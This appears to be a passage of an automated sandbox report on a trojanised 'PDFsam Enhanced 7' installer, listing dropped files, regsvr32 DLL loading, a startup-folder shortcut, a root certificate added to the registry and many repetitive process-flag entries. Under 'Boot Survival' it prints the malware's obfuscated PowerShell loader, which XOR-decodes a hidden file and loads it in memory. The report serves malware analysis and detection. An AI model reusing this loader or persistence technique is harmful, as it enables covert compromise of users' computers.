                        Source: MSI60E.tmp.0.drStatic PE information: section name: _RDATA
                        Source: MSI29D3.tmp.0.drStatic PE information: section name: _RDATA
                        Source: MSID20.tmp.1.drStatic PE information: section name: _RDATA
                        Source: MSIEE6.tmp.1.drStatic PE information: section name: _RDATA
                        Source: MSIF74.tmp.1.drStatic PE information: section name: _RDATA
                        Source: MSI11D7.tmp.1.drStatic PE information: section name: _RDATA
                        Source: MSI1265.tmp.1.drStatic PE information: section name: _RDATA
                        Source: MSI1A75.tmp.1.drStatic PE information: section name: _RDATA
                        Source: MSI26BB.tmp.1.drStatic PE information: section name: _RDATA
                        Source: MSI294D.tmp.1.drStatic PE information: section name: _RDATA
                        Source: PDFsam_Enhanced_7_Installer.exe.6.drStatic PE information: real checksum: 0x101e495 should be:
                        Source: PDFsamEnhanced7Installer.exe.1.drStatic PE information: real checksum: 0x101e495 should be:
                        Source: C:\Users\user\AppData\Roaming\PDFsamEnhanced7Installer.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s 'C:\ProgramData\PDFsam Enhanced 7\Installation\Statistics.dll'
                        Source: C:\Users\user\AppData\Roaming\PDFsamEnhanced7Installer.exeFile created: C:\ProgramData\PDFsam Enhanced 7\Installation\Statistics.dllJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\PDFsamEnhanced7Installer.exeFile created: C:\ProgramData\PDFsam Enhanced 7\Installation\PDFsam_Enhanced_7_Installer.exeJump to dropped file
                        Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI26BB.tmpJump to dropped file
                        Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI11D7.tmpJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\PDFsamEnhanced7Installer.exeFile created: C:\ProgramData\PDFsam Enhanced 7\Installation\Statistics.dllJump to dropped file
                        Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\MSI29D3.tmpJump to dropped file
                        Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIEE6.tmpJump to dropped file
                        Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIF74.tmpJump to dropped file
                        Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI1265.tmpJump to dropped file
                        Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI1A75.tmpJump to dropped file
                        Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\MSI35C.tmpJump to dropped file
                        Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\PDFsamEnhanced7Installer.exeJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\PDFsamEnhanced7Installer.exeFile created: C:\ProgramData\PDFsam Enhanced 7\Installation\PDFsam_Enhanced_7_Installer.exeJump to dropped file
                        Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\MSI5DE.tmpJump to dropped file
                        Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI294D.tmpJump to dropped file
                        Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\MSI60E.tmpJump to dropped file
                        Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSID20.tmpJump to dropped file
                        Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI26BB.tmpJump to dropped file
                        Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI11D7.tmpJump to dropped file
                        Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIEE6.tmpJump to dropped file
                        Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIF74.tmpJump to dropped file
                        Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI1265.tmpJump to dropped file
                        Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI1A75.tmpJump to dropped file
                        Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI294D.tmpJump to dropped file
                        Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSID20.tmpJump to dropped file

                        Boot Survival:

                        barindex
                        Powershell creates an autostart linkShow sources
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: .LNk');$a29f64734e3450b4638b662e66477.TaRgetPath=$a109bf57d3041890ad34b170ba5b0+'\'+$a4337ecc7094feb76bcc84ecefc29;$a29f64734e3450b4638b662e66477.WiNDowstYLE=7;$a29f64734e3450b4638b662e66477.SaVE();IEX $ab8a56688fd4cb9403fd73389ccef; {[char]$_} $_.PSParentPath.Replace("Microsoft.PowerShell.Core\FileSystem::", "") [String]::Format("{0,10} {1,8}", $_.LastWriteTime.ToString("d"), $_.LastWriteTime.ToString("t")) if ($_ -is [System.IO.DirectoryInfo]) { return '' }if ($_.Attributes -band [System.IO.FileAttributes]::Offline){ return '({0})' -f $_.Length}return $_.Length$ac46caf9ffc4c7b839941d3e2c350='QFVuLWVAczZMYUB0QiZiXk5FK1leUlRSPT81TUh2cFBRS1NtV1FKOG4hMjl4Z3I9NEF0ZkdxWHQlI0tLZn14UHt1YX1QVG9+d0BXdjZHPGxsYXopXlIxPGVeb0BhYD1id1Zgc0swXm5nT1FCI3RjLSo3ai1SM01xbVBhQW9gSUN9cDB9e19mUUZwJXJrYlBsai1JbWZ6bFhjPnBOekVlamsxflp1OWQwcmZzQkxqdEQyP3BqLTkzUnl7P3x+ZnVObzl2V2tpR3dTdSh0Z3stPg==';$aae4ceb7c424279fcf464cdcde86d=[sYstem.iO.FIle]::reaDAllbYTes('C:\Users\user\AppData\Roaming\MICroSoFT\UkpPOYBgmRz\KsTLyOZYmIAkr.IKlPnJSyzYBUXe');fOr($aef4ae006e446f92dc4680e0da252=0;$aef4ae006e446f92dc4680e0da252 -LT $aae4ceb7c424279fcf464cdcde86d.count;){For($a4e46636d5944397119672019e333=0;$a4e46636d5944397119672019e333 -LT $ac46caf9ffc4c7b839941d3e2c350.LenGtH;$a4e46636d5944397119672019e333++){$aae4ceb7c424279fcf464cdcde86d[$aef4ae006e446f92dc4680e0da252]=$aae4ceb7c424279fcf464cdcde86d[$aef4ae006e446f92dc4680e0da252] -bxoR $ac46caf9ffc4c7b839941d3e2c350[$a4e46636d5944397119672019e333];$aef4ae006e446f92dc4680e0da252++;IF($aef4ae006e446f92dc4680e0da252 -GE $aae4ceb7c424279fcf464cdcde86d.coUNT){$a4e46636d5944397119672019e333=$ac46caf9ffc4c7b839941d3e2c350.lenGtH}}};[sYsTeM.ReflEcTIon.asseMbLy]::lOAd($aae4ceb7c424279fcf464cdcde86d);[a58b92819f74a08223fbd41c9efcf.a081375717c4dabd0e9d5ff272624]::a2311544abd4fcba55524af320681(
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\MIcROsOft\WinDows\sTaRT mENu\prOGrams\sTartuP\aceef8ac0de486b7cbb4c345e0d7f.LNkJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\MIcROsOft\WinDows\sTaRT mENu\prOGrams\sTartuP\aceef8ac0de486b7cbb4c345e0d7f.LNkJump to behavior
                        Source: C:\Windows\System32\msiexec.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4 BlobJump to behavior
                        Source: C:\Windows\System32\msiexec.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
                        Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\PDFsamEnhanced7Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\PDFsamEnhanced7Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\PDFsamEnhanced7Installer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\PDFsamEnhanced7Installer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\PDFsamEnhanced7Installer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\PDFsamEnhanced7Installer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\PDFsamEnhanced7Installer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\PDFsamEnhanced7Installer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\PDFsamEnhanced7Installer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\PDFsamEnhanced7Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\PDFsamEnhanced7Installer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\PDFsamEnhanced7Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\PDFsamEnhanced7Installer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\PDFsamEnhanced7Installer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\PDFsamEnhanced7Installer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\PDFsamEnhanced7Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\PDFsamEnhanced7Installer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\PDFsamEnhanced7Installer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\PDFsamEnhanced7Installer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\PDFsamEnhanced7Installer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\PDFsamEnhanced7Installer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\PDFsamEnhanced7Installer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\PDFsamEnhanced7Installer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
